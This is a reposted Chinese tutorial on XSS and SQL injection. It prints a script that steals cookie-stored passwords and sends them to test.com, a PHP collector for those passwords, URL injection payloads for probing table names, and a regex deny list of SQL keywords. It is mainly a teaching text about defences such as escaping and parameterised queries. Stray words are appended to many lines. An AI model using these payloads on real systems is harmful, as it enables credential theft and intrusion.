【轉載】XSS攻擊和sql注入
XSS攻擊: https://www.cnblogs.com/dolphinX/p/3391351.htmljavascript
跨站腳本攻擊(Cross Site Script爲了區別於CSS簡稱爲XSS)指的是惡意攻擊者往Web頁面裏插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的html代碼會被執行,從而達到惡意用戶的特殊目的。php
一個簡單的留言板
咱們有個頁面用於容許用戶發表留言,而後在頁面底部顯示留言列表css
<!DOCTYPE html>
<html>
<head>
<?php include('/components/headerinclude.php');?></head>
<style type="text/css">
.comment-title{
font-size:14px;
margin: 6px 0px 2px 4px;
}
.comment-body{
font-size: 14px;
color:#ccc;
font-style: italic;
border-bottom: dashed 1px #ccc;
margin: 4px;
}
</style>
<script type="text/javascript" src="/js/cookies.js"></script>
<body>
<form method="post" action="list.php">
<div style="margin:20px;">
<div style="font-size:16px;font-weight:bold;">Your Comment</div>
<div style="padding:6px;">
Nick Name:
<br/>
<input name="name" type="text" style="width:300px;"/>
</div>
<div style="padding:6px;">
Comment:
<br/>
<textarea name="comment" style="height:100px; width:300px;"></textarea>
</div>
<div style="padding-left:230px;">
<input type="submit" value="POST" style="padding:4px 0px; width:80px;"/>
</div>
<div style="border-bottom:solid 1px #fff;margin-top:10px;">
<div style="font-size:16px;font-weight:bold;">Comments</div>
</div>
<?php
require('/components/comments.php');
if(!empty($_POST['name'])){
addElement($_POST['name'],$_POST['comment']);
}
renderComments();
?>
</div>
</form>
</body>
</html>
addElement()方法用於添加新的留言,而renderComments()方法用於展留言列表,網頁看起來是這樣的html
XSS
由於咱們徹底信任了用戶輸入,但有些別有用心的用戶會像這樣的輸入java
這樣不管是誰訪問這個頁面的時候控制檯都會輸出「Hey you are a fool fish!」,若是這只是個惡意的小玩笑,有些人作的事情就不可愛了,有些用戶會利用這個漏洞竊取用戶信息、誘騙人打開惡意網站或者下載惡意程序等,看個最簡單的例子程序員
利用xss竊取用戶名密碼
固然這個示例很簡單,幾乎攻擊不到任何網站,僅僅看看其原理。咱們知道不少登錄界面都有記住用戶名、密碼的功能方便用戶下次登陸,有些網站是直接用明文記錄用戶名、密碼,惡意用戶註冊帳戶登陸後使用簡單工具查看cookie結構名稱後,若是網站有xss漏洞,那麼簡單的利用jsonp就能夠獲取其它用戶的用戶名、密碼了。正則表達式
惡意用戶會這麼輸入sql
咱們看看http://test.com/hack.js裏藏了什麼數據庫
var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);
幾句簡單的javascript,獲取cookie中的用戶名密碼,利用jsonp把向http://test.com/index.phpjson
發送了一個get請求
<?php
if(!empty($_GET['password'])){
$username=$_GET['username'];
$password=$_GET['password'];
try{
$path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';
$fp=fopen($path,'a');
flock($fp, LOCK_EX);
fwrite($fp, "$username\t $password\r\n");
flock($fp, LOCK_UN);
fclose($fp);
}catch(Exception $e){
}
}
?>
這樣惡意用戶就把訪問留言板的用戶的信息竊取了
怎麼預防
上面演示的是一個很是簡單的XSS攻擊,還有不少隱蔽的方式,可是其核心都是利用了腳本注入,所以咱們解決辦法其實很簡單,不信賴用戶輸入,對特殊字符如」<」,」>」轉義,就能夠從根本上防止這一問題,固然不少解決方案都對XSS作了特定限制,如上面這中作法在ASP.NET中不幸不一樣,微軟validateRequest對錶單提交自動作了XSS驗證。但防不勝防,總有些聰明的惡意用戶會到咱們的網站搞破壞,對本身站點不放心能夠看看這個XSS跨站測試代碼大全試試站點是否安全。
Sql注入: https://www.cnblogs.com/rush/archive/2011/12/31/2309203.html
1.1.1 摘要
日前,國內最大的程序員社區CSDN網站的用戶數據庫被黑客公開發布,600萬用戶的登陸名及密碼被公開泄露,隨後又有多家網站的用戶密碼被流傳於網絡,連日來引起衆多網民對本身帳號、密碼等互聯網信息被盜取的廣泛擔心。
網絡安全成爲了如今互聯網的焦點,這也偏偏觸動了每一位用戶的神經,因爲設計的漏洞致使了不可收拾的惡果,驗證了一句話「出來混的,早晚是要還的」,因此我想經過專題博文介紹一些經常使用的攻擊技術和防範策略。
SQL Injection也許不少人都知道或者使用過,若是沒有了解或徹底沒有聽過也沒有關係,由於接下來咱們將介紹SQL Injection。
1.1.2 正文
SQL Injection:就是經過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。
具體來講,它是利用現有應用程序,將(惡意)的SQL命令注入到後臺數據庫引擎執行的能力,它能夠經過在Web表單中輸入(惡意)SQL語句獲得一個存在安全漏洞的網站上的數據庫,而不是按照設計者意圖去執行SQL語句。
首先讓咱們瞭解何時可能發生SQL Injection。
假設咱們在瀏覽器中輸入URL www.sample.com,因爲它只是對頁面的簡單請求無需對數據庫動進行動態請求,因此它不存在SQL Injection,當咱們輸入www.sample.com?testid=23時,咱們在URL中傳遞變量testid,而且提供值爲23,因爲它是對數據庫進行動態查詢的請求(其中?testid=23表示數據庫查詢變量),因此咱們能夠該URL中嵌入惡意SQL語句。
如今咱們知道SQL Injection適用場合,接下來咱們將經過具體的例子來講明SQL Injection的應用,這裏咱們以pubs數據庫做爲例子。
咱們經過Web頁面查詢job表中的招聘信息,job表的設計以下:
圖1 jobs表
接着讓咱們實現Web程序,它根據工做Id(job_id)來查詢相應的招聘信息,示意代碼以下:
/// <summary>
/// Handles the Load event of the Page control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="System.EventArgs"/> instance containing the event data.</param>
protected void Page_Load(object sender, EventArgs e)
{
if (!IsPostBack)
{
// Gets departmentId from http request.
string queryString = Request.QueryString["departmentID"];
if (!string.IsNullOrEmpty(queryString))
{
// Gets data from database.
gdvData.DataSource = GetData(queryString.Trim());
// Binds data to gridview.
gdvData.DataBind();
}
}
}
如今咱們已經完成了Web程序,接下來讓咱們查詢相應招聘信息吧。
圖2 job表查詢結果
如圖所示,咱們要查詢數據庫中工做Id值爲1的工做信息,並且在頁面顯示了該工做的Id,Description,Min Lvl和Max Lvl等信息。
如今要求咱們實現根據工做Id查詢相應工做信息的功能,想必你們很快能夠給出解決方案,SQL示意代碼以下:
SELECT job_id, job_desc, min_lvl, max_lvl FROM jobs WHERE (job_id = 1)
假設如今要求咱們獲取Department表中的全部數據,並且必須保留WHERE語句,那咱們只要確保WHERE恆真就OK了,SQL示意代碼以下:
SELECT job_id, job_desc, min_lvl, max_lvl FROM jobs WHERE (job_id = 1) OR 1 = 1
上面咱們使得WHERE恆真,因此該查詢中WHERE已經不起做用了,其查詢結果等同於如下SQL語句。
SELECT job_id, job_desc, min_lvl, max_lvl FROM jobs
SQL查詢代碼實現以下:
string sql1 = string.Format(
"SELECT job_id, job_desc, min_lvl, max_lvl FROM jobs WHERE job_id='{0}'", jobId);
如今咱們要經過頁面請求的方式,讓數據庫執行咱們的SQL語句,咱們要在URL中嵌入惡意表達式1=1(或2=2等等),以下URL所示:
http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or'1'='1
等效SQL語句以下:
SELECT job_id, job_desc, min_lvl, max_lvl FROM jobs WHERE job_id = '1' OR '1' = 1'
圖3 job表查詢結果
如今咱們把job表中的全部數據都查詢出來了,僅僅經過一個簡單的恆真表達式就能夠進行了一次簡單的攻擊。
雖然咱們把job表的數據都查詢出來了,但數據並無太大的價值,因爲咱們把該表臨時命名爲job表,因此接着咱們要找出該表真正表名。
首先咱們假設表名就是job,而後輸入如下URL:
http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or 1=(select count(*) from job)--
等效SQL語句以下:
SELECT job_id, job_desc, min_lvl, max_lvl FROM jobs WHERE job_id='1'or 1=(select count(*) from job) --'
圖4 job表查詢結果
當咱們輸入了以上URL後,結果服務器返回咱們錯誤信息,這證實了咱們的假設是錯誤的,那咱們該感受到挫敗嗎?不,其實這裏返回了不少信息,首先它證實了該表名不是job,並且它還告訴咱們後臺數據庫是SQL Server,不是MySQL或Oracle,這也設計一個漏洞把錯誤信息直接返回給了用戶。
接下假定表名是jobs,而後輸入如下URL:
http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or1=(select count(*) from jobs) --
等效SQL語句以下:
SELECT job_id, job_desc, min_lvl, max_lvl FROM jobs WHERE job_id='1'or 1=(select count(*) from jobs) --'
圖5 job表查詢結果
如今證實了該表名是jobs,這能夠邁向成功的一大步,因爲咱們知道了表名就能夠對該表進行增刪改操做了,並且咱們還能夠猜想出更多的表對它們做出修改,一旦修改爲功那麼這將是一場災難。
如今你們已經對SQL Injection的攻擊有了初步的瞭解了,接下讓咱們學習如何防止SQL Injection。
總的來講有如下幾點:
1.永遠不要信任用戶的輸入,要對用戶的輸入進行校驗,能夠經過正則表達式,或限制長度,對單引號和雙"-"進行轉換等。
2.永遠不要使用動態拼裝SQL,可使用參數化的SQL或者直接使用存儲過程進行數據查詢存取。
3.永遠不要使用管理員權限的數據庫鏈接,爲每一個應用使用單獨的權限有限的數據庫鏈接。
4.
而後繼續校驗輸入數據中是否包含SQL語句的保留字,如:WHERE,EXEC,DROP等。
如今讓咱們編寫正則表達式來校驗用戶的輸入吧,正則表達式定義以下:
private static readonly Regex RegSystemThreats = new Regex(@"\s?or\s*|\s?;\s?|\s?drop\s|\s?grant\s|^'|\s?--|\s?union\s|\s?delete\s|\s?truncate\s|" + @"\s?sysobjects\s?|\s?xp_.*?|\s?syslogins\s?|\s?sysremote\s?|\s?sysusers\s?|\s?sysxlogins\s?|\s?sysdatabases\s?|\s?aspnet_.*?|\s?exec\s?", RegexOptions.Compiled | RegexOptions.IgnoreCase);上面咱們定義了一個正則表達式對象RegSystemThreats,而且給它傳遞了校驗用戶輸入的正則表達式。
因爲咱們已經完成了對用戶輸入校驗的正則表達式了,接下來就是經過該正則表達式來校驗用戶輸入是否合法了,因爲.NET已經幫咱們實現了判斷字符串是否匹配正則表達式的方法——IsMatch(),因此咱們這裏只需給傳遞要匹配的字符串就OK了。
示意代碼以下:
/// <summary> /// A helper method to attempt to discover [known] SqlInjection attacks. /// </summary> /// <param name="whereClause">string of the whereClause to check</param> /// <returns>true if found, false if not found </returns> public static bool DetectSqlInjection(string whereClause) { return RegSystemThreats.IsMatch(whereClause); } /// <summary> /// A helper method to attempt to discover [known] SqlInjection attacks. /// </summary> /// <param name="whereClause">string of the whereClause to check</param> /// <param name="orderBy">string of the orderBy clause to check</param> /// <returns>true if found, false if not found </returns> public static bool DetectSqlInjection(string whereClause, string orderBy) { return RegSystemThreats.IsMatch(whereClause) || RegSystemThreats.IsMatch(orderBy); }
如今咱們完成了校驗用的正則表達式,接下來讓咱們須要在頁面中添加校驗功能。
/// <summary> /// Handles the Load event of the Page control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="System.EventArgs"/> instance containing the event data.</param> protected void Page_Load(object sender, EventArgs e) { if (!IsPostBack) { // Gets departmentId from http request. string queryString = Request.QueryString["jobId"]; if (!string.IsNullOrEmpty(queryString)) { if (!DetectSqlInjection(queryString) && !DetectSqlInjection(queryString, queryString)) { // Gets data from database. gdvData.DataSource = GetData(queryString.Trim()); // Binds data to gridview. gdvData.DataBind(); } else { throw new Exception("Please enter correct field"); } } } }
當咱們再次執行如下URL時,被嵌入的惡意語句被校驗出來了,從而在必定程度上防止了SQL Injection。
http://localhost:3452/ExcelUsingXSLT/Default.aspx?jobid=1'or'1'='1
圖6 添加校驗查詢結果
但使用正則表達式只能防範一些常見或已知SQL Injection方式,並且每當發現有新的攻擊方式時,都要對正則表達式進行修改,這但是吃力不討好的工做。
經過參數化存儲過程進行數據查詢存取
首先咱們定義一個存儲過程根據jobId來查找jobs表中的數據。
-- ============================================= -- Author: JKhuang -- Create date: 12/31/2011 -- Description: Get data from jobs table by specified jobId. -- ============================================= ALTER PROCEDURE [dbo].[GetJobs] -- ensure that the id type is int @jobId INT AS BEGIN -- SET NOCOUNT ON; SELECT job_id, job_desc, min_lvl, max_lvl FROM dbo.jobs WHERE job_id = @jobId GRANT EXECUTE ON GetJobs TO pubs END
接着修改咱們的Web程序使用參數化的存儲過程進行數據查詢。
using (var com = new SqlCommand("GetJobs", con)) { // Uses store procedure. com.CommandType = CommandType.StoredProcedure; // Pass jobId to store procedure. com.Parameters.Add("@jobId", SqlDbType.Int).Value = jobId; com.Connection.Open(); gdvData.DataSource = com.ExecuteScalar(); gdvData.DataBind(); }
如今咱們經過參數化存儲過程進行數據庫查詢,這裏咱們把以前添加的正則表達式校驗註釋掉。
圖7 存儲過程查詢結果
你們看到當咱們試圖在URL中嵌入惡意的SQL語句時,參數化存儲過程已經幫咱們校驗出傳遞給數據庫的變量不是整形,並且使用存儲過程的好處是咱們還能夠很方便地控制用戶權限,咱們能夠給用戶分配只讀或可讀寫權限。
但咱們想一想真的有必要每一個數據庫操做都定義成存儲過程嗎?並且那麼多的存儲過程也不利於平常的維護。
參數化SQL語句
仍是回到以前動態拼接SQL基礎上,咱們知道一旦有惡意SQL代碼傳遞過來,並且被拼接到SQL語句中就會被數據庫執行,那麼咱們是否能夠在拼接以前進行判斷呢?——命名SQL參數。
string sql1 = string.Format("SELECT job_id, job_desc, min_lvl, max_lvl FROM jobs WHERE job_id = @jobId"); using (var con = new SqlConnection(ConfigurationManager.ConnectionStrings["SQLCONN1"].ToString())) using (var com = new SqlCommand(sql1, con)) { // Pass jobId to sql statement. com.Parameters.Add("@jobId", SqlDbType.Int).Value = jobId; com.Connection.Open(); gdvData.DataSource = com.ExecuteReader(); gdvData.DataBind(); }
圖8 參數化SQL查詢結果
這樣咱們就能夠避免每一個數據庫操做(尤爲一些簡單數據庫操做)都編寫存儲過程了,並且當用戶具備數據庫中jobs表的讀權限才能夠執行該SQL語句。
添加新架構
數據庫架構是一個獨立於數據庫用戶的非重複命名空間,您能夠將架構視爲對象的容器(相似於.NET中的命名空間)。
首先咱們右擊架構文件夾,而後新建架構。
圖9 添加HumanResource架構
上面咱們完成了在pubs數據庫中添加HumanResource架構,接着把jobs表放到HumanResource架構中。
圖 10 修改jobs表所屬的架構
當咱們再次執行如下SQL語句時,SQL Server提示jobs無效,這是究竟什麼緣由呢?以前還運行的好好的。
SELECT job_id, job_desc, min_lvl, max_lvl FROM jobs
圖 11 查詢輸出
當咱們輸入完整的表名「架構名.對象名」(HumanResource.jobs)時,SQL語句執行成功。
SELECT job_id, job_desc, min_lvl, max_lvl FROM HumanResource.jobs
爲何以前咱們執行SQL語句時不用輸入完整表名dbo.jobs也能夠執行呢?
這是由於默認的架構(default schema)是dbo,當只輸入表名時,Sql Server會自動加上當前登陸用戶的默認的架構(default schema)——dbo。
因爲咱們使用自定義架構,這也下降了數據庫表名被猜想出來的可能性。
LINQ to SQL
前面使用了存儲過程和參數化查詢,這兩種方法都是很是經常使用的,而針對於.NET Framework的ORM框架也有不少,如:NHibernate,Castle和Entity Framework,這裏咱們使用比較簡單LINQ to SQL。
圖 12 添加jobs.dbml文件
var dc = new pubsDataContext(); int result; // Validates jobId is int or not. if (int.TryParse(jobId, out result)) { gdvData.DataSource = dc.jobs.Where(p => p.job_id == result); gdvData.DataBind(); }
相比存儲過程和參數化查詢,LINQ to SQL咱們只需添加jobs.dbml,而後使用LINQ對錶進行查詢就OK了。
1.1.3 總結
咱們在本文中介紹了SQL Injection的基本原理,經過介紹什麼是SQL Injection,怎樣進行SQL Injection和如何防範SQL Injection。經過一些程序源碼對SQL的攻擊進行了細緻的分析,使咱們對SQL Injection機理有了一個深刻的認識,做爲一名Web應用開發人員,必定不要盲目相信用戶的輸入,而要對用戶輸入的數據進行嚴格的校驗處理,不然的話,SQL Injection將會不期而至。
最後,祝你們新年快樂,身體健康,Code with pleasure。
參考
http://en.wikipedia.org/wiki/SQL_injection
http://msdn.microsoft.com/zh-cn/library/bb153640%28v=SQL.90%29.aspx
- 1. SQL注入和XSS攻擊
- 2. xss攻擊和SQL注入攻擊
- 3. SQL 注入、XSS 攻擊、CSRF 攻擊
- 4. XSS攻擊? CSRF攻擊 ? sql注入?
- 5. SQL注入和XSS攻擊的原理
- 6. CI 防止sql注入和xss攻擊
- 7. PHP防止SQL注入攻擊和XSS攻擊
- 8. 如何防止SQL注入,XSS攻擊和CSRF攻擊
- 9. 常見web攻擊(sql注入,xss攻擊,csrf攻擊)
- 10. XSS攻擊&SQL注入攻擊&CSRF攻擊?
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • YAML 入門教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
-
每一个你不满意的现在,都有一个你没有努力的曾经。